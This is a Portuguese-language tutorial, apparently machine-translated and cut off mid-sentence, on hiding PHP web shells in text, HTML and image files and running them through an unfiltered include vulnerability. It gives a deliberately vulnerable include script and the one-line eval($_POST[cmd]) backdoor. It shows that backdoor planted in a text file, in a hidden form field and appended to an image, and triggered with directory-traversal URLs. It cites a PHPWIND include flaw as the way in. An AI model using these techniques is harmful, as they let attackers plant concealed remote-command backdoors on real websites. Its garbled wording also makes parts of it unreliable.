Você deve saber que se você apenas colocar a instrução PHP na imagem, ela não será executada de qualquer maneira, porque o PHP apenas analisa arquivos com a extensão php. Portanto, é necessário ser capaz de executar as instruções PHP ocultas na imagem. Apenas usamos as funções de chamada em PHP: include, require, etc.
Ainda nos lembramos do artigo sobre como esconder Trojans em fotos há alguns dias. Ou seja, use instruções como include("x.gif") no arquivo PHP para chamar as instruções do cavalo de Tróia ocultas na imagem. As declarações em ASP são semelhantes. Parece muito escondido, mas se você chamar a imagem diretamente, não será difícil para quem entende um pouco de PHP encontrar algo suspeito. Como é difícil passar parâmetros usando o método GET na URL, o desempenho da inserção do Trojan não pode ser totalmente aproveitado.
A função include é usada frequentemente em PHP, por isso causa muitos problemas de segurança. Por exemplo, a vulnerabilidade do PHPWIND1.36 é causada pela falta de filtragem de variáveis por trás do include. A partir disso podemos construir instruções semelhantes para inserir em arquivos PHP. Em seguida, oculte o Trojan em uma imagem ou arquivo HTML, que pode ser considerado mais oculto. Por exemplo, insira a seguinte instrução no fórum PHPWIND: < ''?@include includ/.$PHPWIND_ROOT;? < mailto:?@include 'includ/'.$PHPWIND_ROOT;?>>Os administradores gerais não podem vê-la.
Com a ajuda da função include, podemos ocultar Trojans PHP em muitos tipos de arquivos, como txt, html e arquivos de imagem. Como esses três tipos de arquivos, txt, html e arquivos de imagem, são os mais comuns em fóruns e sistemas de artigos, faremos os testes na ordem a seguir.
Primeiro crie um arquivo PHP test.php. O conteúdo do arquivo é:
<?php.
$teste=$_GET['teste'];
@include 'teste/'.$teste;
?>
Arquivos Txt geralmente são arquivos de descrição, então podemos colocar o Trojan de uma frase no arquivo de descrição do diretório. Basta criar um arquivo TXT t.txt. Colamos a frase Trojan <?eval($_POST[cmd]);?> no arquivo t.txt. Então visite http://localhost/test/test.php?test=../t.txt < http://localhost/phpw/index.php?PHPWIND_ROOT=../robots.txt > Se você vir o t. o conteúdo do txt está OK. Em seguida, adicione o endereço Trojan do cliente backdoor lanker micro PHP em http://localhost/test/test.php?test=../t.txt < http://localhost/phpw/ index.php? PHPWIND_ROOT=../robots.txt > Basta adicionar cmd na senha e você poderá ver os resultados retornados pela execução.
Para arquivos HTML, geralmente são arquivos de modelo. Para permitir que o cavalo de Tróia inserido no arquivo HTML seja chamado e executado sem ser exibido, podemos adicionar uma caixa de texto com atributos ocultos no HTML, como: <input type=hidden value="<?eval($ _POST[cmd ]);?>"> Em seguida, use o mesmo método acima. Os resultados de retorno da execução geralmente podem ser vistos visualizando o arquivo de origem. Por exemplo, use a função de visualização do diretório deste programa. Visualize o conteúdo do arquivo de origem como <input type=hidden value="C:Uniserver2_7swwwtest"> Posso obter o diretório como C:Uniserver2_7swwwtest.
Agora vamos falar sobre arquivos de imagem. O truque mais venenoso é esconder o cavalo de Tróia na imagem. Podemos editar diretamente uma imagem e inserir <?eval($_POST[cmd]);?> no final da imagem.
Após o teste, geralmente não afeta a imagem. Em seguida, adicione o endereço do Trojan cliente da mesma maneira<